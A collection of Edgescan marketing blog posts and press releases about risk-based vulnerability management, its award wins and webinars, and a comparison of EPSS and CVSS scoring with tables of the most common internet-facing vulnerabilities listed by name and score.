Traditionally, vulnerability management systems helped security teams identify, evaluate, prioritize, and mitigate public exposure and vulnerabilities in their organization’s critical assets to reduce the attack surface and maintain compliance.
From the beginning, the fundamental goal was continuous visibility across an organization's global attack surface. These principles haven’t changed since the inception of vulnerability scanners over 20 years ago. However, the evolving attack vectors in organizations' hybrid and multi-cloud environments have introduced new challenges to their effectiveness. Furthermore, the way enterprises implement their vulnerability management systems has changed because of infrastructure evolution.

Let's briefly examine how we arrived at this point and identify some VM pitfalls that your organization, hopefully, is no longer subject to.

#### What is the difference between a vulnerability management system, vulnerability management software, and a vulnerability solution?

A vulnerability management system is a holistic approach to managing a vulnerability program, and it utilizes various software, tools, solutions, and advanced analytics to achieve this. An effective VM system addresses four stages (vulnerability identification, prioritization, remediation, and reporting) and provides the fastest, most accurate findings. This article looks at the entire system of the vulnerability process and the components needed to achieve the most effective outcome: continuous visibility.

#### Late 1990s and Early 2000s: Scan and Patch It

Without a doubt, deploying VM scanners worked successfully to identify and report on vulnerabilities across enterprises. While mostly a manual process, SecOps teams could handle the required assessment workload with this tedious “find it, patch it” approach. However, as networks expanded, VM scanners would slow network traffic and critical applications (e.g., VoIP) due to high utilization.
Soon, VM scanning became a necessary evil that was scheduled at select times so as not to hinder network throughput and business productivity.

#### A Decade Ago – 2010s: Automation and Rating Tools

With the ongoing goal of ‘continuous visibility’ and fast remediation, VM systems evolved beyond scanning appliances and objective CVSS-based ratings. Vulnerability management platforms implemented more automation of threat detection and remediation capabilities to expedite incident resolution and scale to support large, expanding enterprises. To save time and money, VM systems provided automated playbooks and workflow presets to increase efficiency and reduce human error, while some VM systems added more vulnerability rating tools beyond just CVSS. However, with the adoption of cloud services, the attack surface expanded, the number of vulnerabilities increased exponentially, and security teams were, once again, overwhelmed as not all incidents could be readily addressed and prioritized. A new approach was again needed.

#### Today – 2020s: The Rise of Risk-based Vulnerability Management

Without question, risk-based prioritization is essential for modern vulnerability management. Still based on a continuous visibility foundation, advanced vulnerability management solutions utilize multiple techniques to discover and assess the more transient devices and systems in today’s dynamic cloud and mobile environments. Up-to-the-minute inventory discovery and assessment is essential as services and users come and go on the network.

One of the most significant advancements in VM systems is that modern security solutions now rely on advanced vulnerability and threat intelligence to discover and assess new cloud services and mobile devices. This intelligence is coupled with risk-rating tools to prioritize threats and exposures more accurately, so that the most business-critical vulnerabilities are addressed first.
The most effective Risk-based Vulnerability Management (RBVM) solutions combine multiple rating systems while analyzing and mitigating known and unknown threats based on true business risk rather than incident severity level alone.

#### Risk-Based Vulnerability Management: A Key Component of a Modern Vulnerability Management System

Edgescan’s Risk-based Vulnerability Management solution is a key component of its integrated security platform and a necessary tool for a modern vulnerability management system. It delivers validated vulnerability data and quickly rates the severity level of each exposure using a proprietary scoring process called EVSS (Edgescan Validated Security Score). The platform also uses these industry-established risk-rating systems:

• CVSS — Common Vulnerability Scoring System
• EPSS — Exploit Prediction Scoring System
• CISA KEV — CISA Known Exploited Vulnerability

Edgescan is a full-stack platform that integrates RBVM software along with four essential security technologies into one platform; these solutions include:

• Penetration Testing as a Service (PTaaS)
• External Attack Surface Management (EASM)
• Application Security Testing (AST)
• Web and API Security Testing

All these technologies utilize a common, extensive data lake and an integrated, intuitive user interface – advancing vulnerability intelligence and simplifying operations and training. The “full stack” intelligence we garner by combining these tools is unparalleled in the industry and helps our customers maintain a strong security posture through (once again) continuous visibility. Edgescan’s actionable, risk-rated vulnerability intelligence helps security teams ‘know where to focus first’, understand exposure details and risk levels, and accelerate response times.

Watch this platform overview video to learn more about how Edgescan can help your organization modernize its vulnerability management system and achieve continuous visibility and fast remediation, or request a personalized demo here >>

### On-Demand Webinar: How Risk-Based Vulnerability Management Is Redefining Protection

Are you struggling to keep up with the never-ending stream of security vulnerabilities and wondering how to effectively allocate your resources? Our recent webinar, featuring industry experts Erik Nost, Jim Manico, and Rahim Jain, addressed the crucial topic of Risk-Based Vulnerability Management (RBVM) and explained why it's a game-changer in cybersecurity. The experts provided valuable insights that can help you better understand RBVM and its benefits.

Watch the On-demand Webinar >>

Webinar Highlights:

• Defining RBVM: The experts demystified RBVM, emphasizing that it's not just about identifying vulnerabilities but understanding their impact on your organization. It's about making informed decisions by considering factors like risk, compensating controls, and potential threats.
• The Essence of Context: Erik Nost stressed the importance of context in risk assessment. Knowing about vulnerabilities is not enough; you need to understand how they affect what's most critical for your organization.
This contextual approach enables better prioritization and resource allocation.
• Resource Management: RBVM allows organizations to allocate resources wisely. It's not just about fixing everything but about making calculated decisions. Sometimes, quick actions, like patching vulnerabilities, are necessary, even without extensive analysis.
• Balancing Act: The webinar addressed the balance between data overload and comprehensive information needs. While having more data is beneficial, organizations should balance informed decisions and time-sensitive actions.
• Collaboration and Openness: Rahim Jain emphasized the value of community-driven efforts in RBVM. Sharing knowledge and insights within the cybersecurity community can help organizations make more informed decisions and adapt to evolving threats.

The million-dollar question: Is Risk-Based Vulnerability Management effective? According to our experts, the answer is a resounding yes. RBVM empowers organizations to:

• Make informed decisions based on the true impact of vulnerabilities.
• Prioritize resources for maximum efficiency.
• Reduce the risk of overlooking critical vulnerabilities.
• Adapt quickly to emerging threats.

While RBVM requires a strategic approach and the right tools, it offers clear benefits in optimizing your organization's security efforts. Although there may be challenges in obtaining comprehensive data and the need for quick decision-making in certain situations, the benefits of Risk-Based Vulnerability Management (RBVM) far outweigh any potential drawbacks. It is a powerful approach for effectively navigating the complex landscape of cybersecurity threats and vulnerabilities.

Don't miss out on the full webinar to gain in-depth insights and practical tips on implementing RBVM in your organization.
Unlock the full potential of RBVM to enhance your cybersecurity strategy and protect what matters most to your business.

Watch the On-demand Webinar >>

Discover how RBVM can revolutionize your approach to vulnerability management and strengthen your organization's defenses against cyber threats.

### Forbes Article Summary: Overhyped Tech – What to Keep an Eye On

In a world where technological advancements are lauded as the next big thing, it's crucial to separate hype from reality. In a recent article featured on Forbes, members of the Forbes Technology Council weighed in on 19 consumer and business technologies and systems that might not live up to the hype or may have hidden downsides. Among these experts, Eoin Keary, Founder and CEO of Edgescan, contributed insights into Risk-Based Vulnerability Management (RBVM).

#### The Hype vs. Reality in Tech

The tech industry frequently buzzes with excitement over groundbreaking innovations. Artificial Intelligence (AI), Blockchain, and the Metaverse have captured the imaginations of many. However, Eoin Keary reminds us that much of today's AI is based on mathematical algorithms organized into functionality models. While valuable, it falls short of true artificial intelligence. Similarly, despite its potential, Blockchain remains complex, expensive to implement, and lacks trust, standards, and regulations.

#### Risk-Based Vulnerability Management (RBVM)

Eoin Keary's expertise in cybersecurity sheds light on a critical aspect of the technology landscape. RBVM, hailed for its effectiveness in prioritizing vulnerabilities, faces a significant challenge—the accuracy of vulnerability discovery. Without precise vulnerability detection, applying risk metadata to false alarms can amplify the problem. Keary emphasizes that effective security solutions begin with accurate input, a fundamental but often overlooked aspect. Edgescan recognizes the importance of precision in vulnerability management in the ever-evolving cybersecurity landscape.
It's not just about identifying vulnerabilities; it's about ensuring the identified issues are genuine threats.

#### The Reality of Tech

In an era where technology shapes our lives, understanding the actual capabilities and limitations of emerging tech is essential. From Artificial Intelligence to Space Tourism, Forbes Technology Council members offer a reality check on tech's most hyped concepts. Eoin Keary's contribution highlights the critical role of accuracy in vulnerability management. Edgescan continues to lead in delivering precise and effective cybersecurity solutions, emphasizing the importance of true risk prioritization.

For the full article and insights from other tech experts, visit Forbes Technology Council's discussion on overhyped technologies. In a world filled with promises, discerning the genuine game-changers from the overhyped is a skill every technology enthusiast should possess.

### Edgescan: Leading the Charge in Cybersecurity

Edgescan has been recognized by two organizations as a key player in external attack surface management and application security testing software.

In an era where cybersecurity threats are increasing alarmingly, organizations must proactively safeguard their digital assets. Expert Insights and Orbis Research have spotlighted Edgescan's exceptional contributions to cybersecurity, specifically in the areas of External Attack Surface Management (EASM) and Application Security Testing (AST) software solutions.

#### Recognizing Edgescan in the Top 10 External Attack Surface Management Software Solutions

Expert Insights recognized Edgescan as a prominent player, earning a spot in the "Top 10 External Attack Surface Management Software Solutions."
This recognition emphasizes the company's commitment to improving businesses' security posture by identifying and mitigating exposures across their IT ecosystem and internal infrastructure.

Edgescan's EASM solution is designed to provide comprehensive visibility into an organization's attack surface, encompassing all the digital assets and potential entry points that attackers can exploit. It goes beyond conventional vulnerability scanning by offering continuous monitoring and real-time insights into vulnerabilities across web applications, APIs, and network infrastructure.

One of Edgescan's distinguishing features is its ability to correlate and prioritize vulnerabilities by risk, allowing organizations to focus on addressing the most critical threats first to ensure a strong security posture is achieved and maintained. This proactive approach is crucial in today's dynamic threat landscape, where cyberattacks constantly evolve.

Moreover, Edgescan's EASM solution excels in its capacity to integrate seamlessly with existing security tools and workflows, facilitating a holistic and efficient cybersecurity strategy. Organizations can strengthen their defenses by automating vulnerability discovery and remediation, reducing the manual effort required while improving their security posture.

READ POST >>

#### Acknowledging Edgescan's Contribution to the Global Application Security Testing Software Market

Orbis Research highlighted Edgescan as a key player in the market, contributing substantially to its growth and development.

Organizations that develop or use software applications rely heavily on the AST market to ensure data and infrastructure security. Edgescan's AST solution is comprehensive, identifying and mitigating vulnerabilities to ensure application security and reliability.

Edgescan's application security testing solution utilizes automated scanning, manual testing, and expert analysis to provide in-depth application security coverage.
It offers context and remediation guidance beyond mere vulnerability detection, enabling organizations to address vulnerabilities effectively.

READ POST >>

Edgescan is dedicated to ensuring that your organization's security posture is improved by offering complete and continuous visibility of your global attack surface. Our cybersecurity platform comprises five advanced solutions: External Attack Surface Management, Application Security Testing, Risk-based Vulnerability Management, Penetration Testing as a Service, and API Security Testing. The combination of these solutions helps businesses proactively safeguard themselves against emerging cyber threats.

### Edgescan Garners Two Awards in the 2023 Computing Security Awards Event

Edgescan Wins Gold for the Penetration Testing Solution of the Year Award and Receives the Runner-up Position for the Customer Service Award

DUBLIN – October 25, 2023 – Edgescan, the first fully integrated cybersecurity platform, announces it has garnered two awards in the 2023 Computing Security Awards event. Edgescan Penetration Testing as a Service (PTaaS) won the Best Penetration Testing Solution of the Year Award, while its Customer Service organization earned the Runner-up position for the Cyber Security Customer Service Award. Edgescan won based on the strength of the nomination and a popular vote from members of the cybersecurity community.

“Edgescan is honored to be recognized for its trusted and proven PTaaS solution as well as its excellent Customer Service,” states Eoin Keary, Founder and CEO of Edgescan.
“Pentesting should be an integral component to any organization’s overall security strategy, and we are confident in enabling our customers with more secure, productive environments.”

Edgescan Penetration Testing as a Service (PTaaS) offers greater scale, agility, and risk awareness versus traditional onsite pen-testing tools and processes. PTaaS provides organizations of all sizes with the ability to expose and mitigate vulnerabilities without the need for significant human resources, saving time and costs, while maintaining compliance. This enables IT and SecOps teams to focus on enabling and securing their primary business objectives rather than overextending themselves into areas that are not their forte. By employing PTaaS, businesses can accelerate their development and operations, meet compliance mandates, and quickly and accurately discover and mitigate security vulnerabilities based on business risk without hindering the productivity of their organization.

The Edgescan PTaaS solution utilizes the Edgescan security team’s extensive technical expertise as well as the entire suite of applications within the Edgescan platform to provide vulnerability assessment, exposure validation, and risk ratings. Edgescan security experts offer battle-hardened security experience combined with countless industry accreditations, such as CREST, OSCP, and CEH, to provide clients with deep wisdom and insight to readily resolve their security needs.

“This award confirms the excellent Customer Service that Edgescan offers its customers across the globe,” says Brian Heavey, CTO of Edgescan. “We implement industry best practices, combined with continuous enhancement and innovation, to support our customers’ every need. As our 95% customer retention rate confirms, their ongoing, effective security is paramount to our success.”

Sign up for a demo to learn more about the Edgescan Platform and our PTaaS solution.
#### About Computing Security

Published by BTC, Computing Security magazine is a bimonthly publication bringing our registered readers the latest news, thought leadership, and product reviews relating to IT security. It covers the major cybersecurity issues that businesses encounter as they seek out the best solutions, advice, and strategies to keep their operations safe, productive, and always ahead of the game.

#### About Edgescan

Edgescan is an integrated cybersecurity platform that unifies five robust security solutions into a single combative platform. These solutions include External Attack Surface Management (EASM), Risk-based Vulnerability Management (RBVM), Application Security Testing (AST), API Security Testing, and Penetration Testing as a Service (PTaaS). The platform is a hybrid solution that provides automated vulnerability intelligence with validation done by humans – it is what differentiates us from scanning tools, providing real and actionable results. The platform reduces the complexity and overhead associated with tool proliferation, cuts operational costs, and delivers risk-rated vulnerability data to speed up remediation, ensuring a strong security posture.

Christine Carrig
Senior Vice President, Global Marketing
Edgescan
pr@edgescan.com

### Vulnerability Statistics Snapshot

The information presented here gives you an overview of the most recent data extracted from the Edgescan platform, which uses authentic vulnerability intelligence from actual companies. This data will provide you with up-to-date information about the risks in the “wild.” It is a supplement to our Vulnerability Statistics Report, which is released annually in late Winter.

#### Approaches to Vulnerability Prioritization: Comparing EPSS with CVSS v3.0

As you may know, not all security vulnerabilities are the same. Some present minimal risk to your infrastructure, while others pose significant risk and can be detrimental to the operations and integrity of your business.
Understanding that level of discrepancy amongst vulnerabilities helps make incident response and mitigation more effective while minimizing the headaches brought on by the resolution process. Let’s look at two common methods to estimate the occurrence of significant risk vulnerabilities. The list is based on filtering the top 20 most common vulnerabilities discovered from a total list of 247,000 vulnerabilities by Edgescan between January and September 2023. (See the supporting charts at the end of this article.)

• Most occurrences of a vulnerability with a minimum CVSS v3.0 score of 8.0;
• Most occurrences of a vulnerability with a minimum EPSS score of 0.9.

The challenge here is precisely how to define “significant risk”. Should it be based on CVSS or EPSS? The result impacts prioritization in all cases. First, let’s ‘set a clean slate’ by defining these terms:

• EPSS: The Exploit Prediction Scoring System (EPSS) is a data-driven effort for estimating the likelihood (probability) that a software vulnerability will be exploited in the wild. https://www.first.org/epss/
• CVSS: The Common Vulnerability Scoring System (CVSS) provides a way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity. https://www.first.org/cvss/

Additionally, consider this component, which indicates those vulnerabilities ‘out in the wild’ of the Internet:

• CISA KEV: A list maintained by the Cybersecurity and Infrastructure Security Agency (CISA) of vulnerabilities known to be exploited on the Internet: https://www.cisa.gov/known-exploited-vulnerabilities-catalog/

Note that estimating the most common occurrence of a vulnerability based on specific risk criteria can result in significant differences depending on the approach to estimating risk. In this case, we compare vulnerabilities using CVSS v3.0 and EPSS attributes. As a result, there is a significant difference in results between using CVSS and EPSS selection criteria.
Top takeaways:

• 6 of the Top 20 vulnerabilities with a CVSS of 8.0 or above are listed on the CISA KEV (marked true in the CISA KEV column of Table 1 below);
• 12 of the Top 20 vulnerabilities with an EPSS of 0.9 or above are listed in the CISA KEV (marked true in the CISA KEV column of Table 2 below);
• EPSS appears to be more aligned with CISA KEV than CVSS based on the sample space used;
• EPSS covers more than 7,000 vulnerabilities, whilst CISA KEV currently contains 1,000+ vulnerabilities.

Overall, a combination of CVSS and EPSS ratings is recommended when attempting to prioritize security vulnerabilities. Introducing threat intelligence mapping to discovered vulnerabilities would also improve pragmatic, laser-focused prioritization. Realize that CVSS v4.0 introduces new attributes, such as threat intelligence, which should improve CVSS effectiveness. Realize that context matters when it comes to vulnerability prioritization - as not all vulnerabilities are created equal. It’s the business risk of these vulnerabilities that is most important.

Besides these industry-established risk-rating systems, Edgescan also delivers validated vulnerability data and quickly rates the severity level of each exposure using a proprietary scoring process called EVSS (Edgescan Validated Security Score). This is a key component of our Risk-based Vulnerability Management (RBVM) solution, which uses automation combined with human intelligence to uniquely test for vulnerabilities that cannot be uncovered through traditional vulnerability scanning alone.

Based on this recent snapshot of information, I’d encourage you to consider this to optimize your vulnerability management program – and reduce any headaches in your remediation process. For more information on how Edgescan can help your organization reduce risk from vulnerabilities and exposures, sign up for a demo to see how it all works.

Table 1.
Top 20 most common vulnerabilities discovered on public Internet-facing systems with a CVSS v3.0 score of 8.0+

| # | Vulnerability | CVSS v3.0 | EPSS | CISA KEV |
|---|---|---|---|---|
| 1 | WordPress Advanced Custom Fields Pro Plugin 5.x < 5.12.3 File Upload Vulnerability | 8.8 | 0 | false |
| 2 | Wowza Streaming Engine < 4.8.17 Multiple Log4j Vulnerabilities (Log4Shell) | 10 | 0.97 | true |
| 3 | Microsoft Exchange Server OWA Multiple Vulnerabilities (Sep 2022, ProxyNotShell) | 8.8 | 0.97 | true |
| 4 | Wowza Streaming Engine <= 4.8.0 Multiple Vulnerabilities | 8.8 | 0.01 | false |
| 5 | Wowza Streaming Engine <= 4.8.11+5 Multiple Vulnerabilities | 8.1 | 0 | false |
| 6 | Spring4Shell | 9.8 | 0.97 | true |
| 7 | PHP < 7.4.30, 8.0.x < 8.0.20, 8.1.x < 8.1.7 Security Update (Jun 2022) - Linux | 8.8 | 0 | false |
| 8 | Microsoft Exchange Server 2013 / 2016 / 2019 Multiple Vulnerabilities (KB5007409) | 8.8 | 0.93 | true |
| 9 | Magento 2.3.3-p1 <= 2.3.7-p2, 2.4.x <= 2.4.3-p1 Multiple RCE Vulnerabilities (APSB22-12) | 9.8 | 0.26 | true |
| 10 | Microsoft Exchange Server 2016 / 2019 Multiple Vulnerabilities (KB5012698) | 8.8 | 0.02 | false |
| 11 | Magento < 2.3.6-p1, 2.4.x < 2.4.1-p1 Multiple Vulnerabilities (APSB21-08) | 9.1 | 0.01 | false |
| 12 | Microsoft Exchange Server 2016 / 2019 Multiple Vulnerabilities (KB5007012) | 9 | 0 | false |
| 13 | Microsoft Exchange Server 2013 / 2016 / 2019 Multiple Vulnerabilities (KB5008631) | 9 | 0 | false |
| 14 | Magento < 2.3.7-p3, 2.4.x < 2.4.3-p2 RCE Vulnerability (APSB22-13) | 8.3 | 0 | false |
| 15 | Magento < 2.3.7-p1, 2.4.x < 2.4.2-p2 Multiple Vulnerabilities (ASPB21-64) | 9.8 | 0 | false |
| 16 | Microsoft Exchange Server 2016 / 2019 Multiple Vulnerabilities (KB5015322) | 8 | 0 | false |
| 17 | PHP < 7.4.28, 8.0.x < 8.0.16, 8.1.x < 8.1.3 Security Update (Feb 2022) - Windows | 9.8 | 0 | false |
| 18 | Apache HTTP Server 2.4.7 - 2.4.51 Multiple Vulnerabilities - Windows | 8.2 | 0.75 | false |
| 19 | SAP Multiple Products Request Smuggling and Request Concatenation Vulnerability (ICMAD, 3123396) | 10 | 0.96 | true |
| 20 | Ipswitch WS_FTP Server < 8.6.1 Multiple Vulnerabilities | 9.8 | 0.01 | false |

Table 2. Top 20 most common vulnerabilities discovered on public Internet-facing systems with an EPSS score of 0.9+

| # | Vulnerability | CVSS v3.0 | EPSS | CISA KEV |
|---|---|---|---|---|
| 1 | SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (LogJam) | 3.7 | 0.97 | false |
| 2 | SSL/TLS: Weak Cipher Suites | 5.9 | 0.97 | false |
| 3 | SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE) | 3.4 | 0.98 | false |
| 4 | OpenSSL 'ChangeCipherSpec' MiTM Vulnerability | 7.4 | 0.97 | false |
| 5 | Wowza Streaming Engine < 4.8.17 Multiple Log4j Vulnerabilities (Log4Shell) | 10 | 0.97 | true |
| 6 | Microsoft Exchange Server OWA Multiple Vulnerabilities (Sep 2022, ProxyNotShell) | 8.8 | 0.97 | true |
| 7 | OpenSSL 'CVE-2016-2107' Padding Oracle Vulnerability | 5.9 | 0.97 | false |
| 8 | Spring4Shell | 9.8 | 0.97 | true |
| 9 | Microsoft Exchange Server 2013 / 2016 / 2019 Multiple Vulnerabilities (KB5007409) | 8.8 | 0.93 | true |
| 10 | SAP Multiple Products Request Smuggling and Request Concatenation Vulnerability (ICMAD, 3123396) | 10 | 0.96 | true |
| 11 | Log4Shell (CVE-2021-44228) | 10 | 0.97 | true |
| 12 | ManageEngine ADSelfService Plus < 6.1 build 6122 Remote Code Execution | 6.8 | 0.95 | true |
| 13 | Cisco Adaptive Security Appliance Software Web Services Interface Cross-Site Scripting Vulnerabilities (cisco-sa-asaftd-xss-multiple-FCB3vPZe) | 6.1 | 0.97 | true |
| 14 | Apache Axis <= 1.4 Multiple Vulnerabilities | 7.5 | 0.96 | false |
| 15 | SSL/TLS EXPORT_RSA <= 512-bit Cipher Suites Supported (FREAK) | 4.3 | 0.97 | false |
| 16 | Oracle Access Manager (OAM) RCE Vulnerability (cpujan2022) | 9.8 | 0.96 | true |
| 17 | WordPress Multiple Vulnerabilities (Jan 2022) - Linux | 8.8 | 0.94 | false |
| 18 | SAP NetWeaver AS Java Multiple Vulnerabilities (2934135) | 10 | 0.97 | true |
| 19 | MobileIron Core Multiple Log4j Vulnerabilities (Log4Shell) | 10 | 0.97 | true |
| 20 | MobileIron Sentry Log4j RCE Vulnerability (Log4Shell) | 10 | 0.97 | true |

### Press Release: Erik Nost, Senior Analyst, and Edgescan Executives to Discuss the Benefits of a Risk-Based Vulnerability Management Solution

Guest speaker
Erik Nost, Senior Analyst, and Edgescan Executives to Discuss the Benefits of a Risk-Based Vulnerability Management Solution in a Webinar on October 5th

DUBLIN – September 28, 2023 – Edgescan, the first fully-integrated cybersecurity platform, announced today an upcoming webinar on Thursday, October 5 at 11:00 AM ET featuring Forrester that discusses risk-based vulnerability management solutions and how they enable a modern, proactive security strategy.

Guest speaker Forrester Senior Analyst Erik Nost joins Edgescan executives Eoin Keary (CEO and Founder, Edgescan) and Jim Manico (Founder, Manicode Security, and Edgescan Strategic Technical Advisor) to discuss the fundamental tools and processes that organizations must employ in their security strategy for continuous assessment and effective risk management.

Forrester Senior Analyst Erik Nost starts the webinar by sharing his views on the advantages of implementing a proactive approach to security. This will be followed by a moderated panel discussion covering topics such as the benefits of risk-based vulnerability management, the advantages and disadvantages of modern cybersecurity platforms, and the critical components required to establish a proactive security strategy that promotes a robust security posture.

“Legacy scanners, using just CVSS scores, produce a tremendous number of false alarms as the vulnerabilities are simply not used in cyber breaches. We need to fix the issues that matter with our limited resources. Accuracy is vital to have a clean prioritization list,” says Eoin Keary, CEO and founder of Edgescan.

To register for the webinar on October 5th at 11:00 AM ET, and for full event details, please visit: https://info.edgescan.com/forrester-webinar-proactive-security-and-rbvm

#### About Edgescan

Edgescan is an integrated cybersecurity platform that unifies five robust security solutions into a single combative platform.
These solutions include External Attack Surface Management (EASM), Risk-based Vulnerability Management (RBVM), Application Security Testing (AST), API Security Testing, and Penetration Testing as a Service (PTaaS). The platform is a hybrid solution that provides automated vulnerability intelligence with validation done by humans – it is what differentiates us from scanning tools, providing real and actionable results. The platform reduces the complexity and overhead associated with tool proliferation, cuts operational costs, and delivers risk-rated vulnerability data to speed up remediation, ensuring a strong security posture.

Christine Carrig
Senior Vice President, Global Marketing
Edgescan
pr@edgescan.com

### Don’t Be in Denial: Discover the Improvements a Risk-based VM Program Will Deliver

Risk-Based Vulnerability Management (RBVM) prioritizes remediation efforts based on the potential impact in a particular environment and the likelihood of exploitation. Knowing which vulnerabilities pose the greatest risk empowers security teams to allocate resources more effectively and improve their overall security posture. So, this leads us to the data used to rate that risk; one of the most utilized frameworks is the Common Vulnerability Scoring System (CVSS). But can this framework be the only reference needed? Why not keep using CVSS as the main framework to evaluate risk in vulnerabilities?

Imagine the Nile River, with its many tributaries and streams pouring towards the Mediterranean, creating a powerful current cutting through East Africa. It seems efficient because all the water is channeled into one path, except during the spring and summer months when the Nile Basin fills with rainwater. The banks of the river swell with rain, which changes the direction and flow of water locally. Prolific flooding occurs upstream, and droughts occur downstream.
#### When it Comes to Risk Prioritization, Context Matters

If every vulnerability was only assessed for risk using one framework, there would be an overflow of resources and attention in certain areas. Numerous factors influence the risk rating of a given vulnerability. If all those factors flow into a single framework, the CVSS river, then it causes flooding and droughts by creating gaps in coverage and diminishing security testing accuracy. Everyone uses CVSS; it’s been trusted for almost 20 years, but the problem with using CVSS alone is that it fails to describe context. For example, only 5% of all vulnerabilities are exploited in the wild.[2]

Edgescan rates the severity of each vulnerability using a proprietary scoring process called EVSS (Edgescan Validated Security Score); in addition, the platform uses CVSS, EPSS (Exploit Prediction Scoring System), CISA KEV (CISA Known Exploited Vulnerability) and the OWASP Top Ten. The Edgescan platform also allows users to edit or accept risk for any individual vulnerability, further customizing the EVSS to prioritize your scanning results.

#### Map and Monitor Your Global Attack Surface

Discovery is the first step to securing your assets using RBVM. Now more than ever, organizations are struggling to keep up with a dynamic, ever-expanding attack surface. That’s why, according to Forbes, “the most common reason organizations struggle to succeed with Risk-based VM is that they don't know the span of their asset environment… Simply put, you can't protect something you don't know exists.”[1] Without knowing the topography of the Nile River Valley, you can’t tell what will be flooded and what will become arid. Without knowing the attack surface of your enterprise, you can’t properly assess risk posture, because not every asset is being scanned.
Edgescan’s external attack surface management solution (EASM) inventories, monitors, and manages corporate assets across disparate environments, providing a view of your entire digital estate. After mapping out your attack surface, any discovered assets can be automatically put into a scanning cadence where it will be assessed and discovered vulnerabilities risk rated. It's also important to note that “a new Risk-based VM solution is probably not your organization's first investment toward vulnerability management.”1  Organizations that know the pain of using old-school vulnerability scanners tend to see the most value from Risk-based VM. Legacy scanners can produce a significant number of false positives, particularly if they are incorrectly configured. False positives reported during security testing with a high CVSS score will cause panic to rip through your SOC, only to discover it poses no threat at all. False positives, regardless of CVSS score, deplete resources that could be spent mitigating REAL risk.   Verified Results = No False Positives Edgescan guarantees no false positives with our unique hybrid approach (using cyber analytics and expertise combined), ensuring that results are always real and actionable. Edgescan’s CEO and Founder, Eoin Keary and AppSec Guru Jim Manico go into more detail about RBVM in this recent podcast: Edgescan War Room - Episode 3 or visit our Risk-based VM solutions page to learn more. You won’t want to be in denial (DeNile) when it comes to the improvements Risk-based VM can make to your cybersecurity management program and improving you security posture.   Reference: 1. Five Best Practices to Succeed At Risk-Based Vulnerability Management 2. 
The EPSS Model

### Forbes Article Summary: Debunking AI Myths: Separating Fact from Fiction

As the world increasingly adopts and integrates artificial intelligence (AI) into various aspects of daily life, a multitude of perceptions about AI have emerged, ranging from excitement to skepticism. However, it is essential to distinguish between fact and fiction regarding AI. In a recent article by Forbes Technology Council members, several myths surrounding AI are debunked, shedding light on the reality of this technology.

Eoin Keary, Founder and CEO of Edgescan, weighs in on the importance of context in AI. He emphasizes that despite its capabilities, AI is currently limited in understanding context, a factor crucial for making everyday decisions. This limitation extends from business to cybersecurity applications. Eoin points out that AI tools are trained for specific tasks and lack the depth of contextual comprehension that human decision-making entails.

The Forbes Technology Council article aims to dispel these myths to foster a more accurate understanding of AI's capabilities and limitations. The broader message underscores the importance of using AI where it excels while being cautious about relying on it for decision-making that requires context.

Edgescan's alignment with the article's perspective is evident. The company's commitment to cybersecurity solutions acknowledges the value of AI in certain applications while emphasizing the significance of human expertise in understanding contextual nuances and making crucial decisions. Edgescan is committed to providing comprehensive cybersecurity solutions. The company recognizes that effective security strategies demand proactive risk management and the strategic allocation of resources.
Businesses can enhance their preparedness against ransomware attacks and other cybersecurity challenges by applying a risk-based approach to security countermeasures. Edgescan's comprehensive approach to cybersecurity, encompassing risk-based vulnerability management, penetration testing, and attack surface management, underscores the company's commitment to providing effective solutions for today's cybersecurity challenges.

The full article is available online at Forbes.

### Cybersecurity Management in Threes

Cybersecurity Management in Threes: Cybersecurity Pitfalls, Components of a Successful Cybersecurity Program, and a Three-step Approach to a Strong Security Posture

As the cybersecurity industry continues to evolve to address more and different threat vectors, the types of solutions needed to effectively secure enterprises are also evolving. While some of these new solutions are intriguing (e.g., machine learning, AI, generative AI), many are still unproven and require more real-world testing and deployment to become mainstream. While new products and technologies garner a lot of talk and interest, there are still some fundamental tools and processes that must be used in any enterprise security strategy for risk management.

That brings me to be somewhat retrospective by (re)asking my company "why we do what we do". Why and how do we at Edgescan follow our unique approach to protecting our customers' assets? Let me address these questions using a common format, based on three relevant key points.

#### Three Cybersecurity Pitfalls

**1 - Vulnerability Scanning Alone is Insufficient**

Don't get me wrong, vulnerability management (VM) is a necessary tool in any enterprise security toolbox BUT, alone, it is not enough.
Testing systems for vulnerabilities is mandatory, but realize there may be bugs or weaknesses in both the target system and in the scanner itself, which may result in false negatives and false positives. And I'm sure you can attest to the growing challenge and frustration of chasing down false alarms.

**2 - A Siloed Approach to Vulnerability Management Does Not Work**

While splitting VM into silos based on network and application vulnerability intelligence may be convenient for some enterprise security teams, it is not a logical or efficient approach in the end. Foremost, effective enterprise cybersecurity management requires full-stack visibility, because hackers will use any and all attack vectors to penetrate your organization. Hackers really don't care where in the stack a vulnerability is if they breach successfully. Uncovering blind spots and understanding their associated risk based on the business context, as well as maintaining a thorough knowledge of your evolving attack surface, is imperative to a solid cybersecurity program. Undoubtedly, receiving feeds of accurate and triaged vulnerability intelligence expedites decision-making and, ultimately, vulnerability mitigation. Prioritization is simplified by answering questions like "Which vulnerabilities should we fix now?" Our "noise suppression" capability provides custom risk ratings and breach predictability and eliminates false positives to help organizations be faster and more effective.

**3 - Traditional Penetration Testing is Antiquated**

Traditional penetration testing is not scalable: it is expensive, slow, requires contracts, and results in a "clunky" PDF report as the primary output. I could elaborate, but I think you get, and know, the point.
#### Three Components of a Successful Cybersecurity Program

**1 - Third-party Tool Integration is Essential**

Edgescan provides an extensible platform that integrates with numerous third-party tools, such as vulnerability management scanners, ticketing systems, reporting applications, GRC tools, and more, for complete visibility and monitoring. Supplying these tools with validated, accurate vulnerability data on demand and over time is tremendously beneficial to SecOps and DevOps teams alike for auditing and trend analysis. You can also sync IPs and hostnames from your cloud environment, and the platform will auto-enroll addresses for EASM (External Attack Surface Management), vulnerability management or penetration testing as a service (PTaaS); we call this "Cloudhook." Cloudhook is Edgescan's native cloud plugin, which keeps pace with the constant state of flux associated with cloud-based deployments.

**2 - Adjacent Technologies as Part of an Effective Security Strategy**

The Edgescan Platform goes far beyond vulnerability management (VM) and penetration testing to include application, web application, and API security, as well as external attack surface management (EASM) capabilities. Following our key philosophy of "you can't secure what you can't see" in pursuit of continuous assessment and resilience, we offer multiple tools to secure the systems and applications used in enterprises today, as well as addressing how best to identify and mitigate evolving threat vectors. I recommend assessing how effective your current tools are at sharing vulnerability intelligence data to "see and secure" your own infrastructure.

**3 - Expert Technical Support is Mandatory**

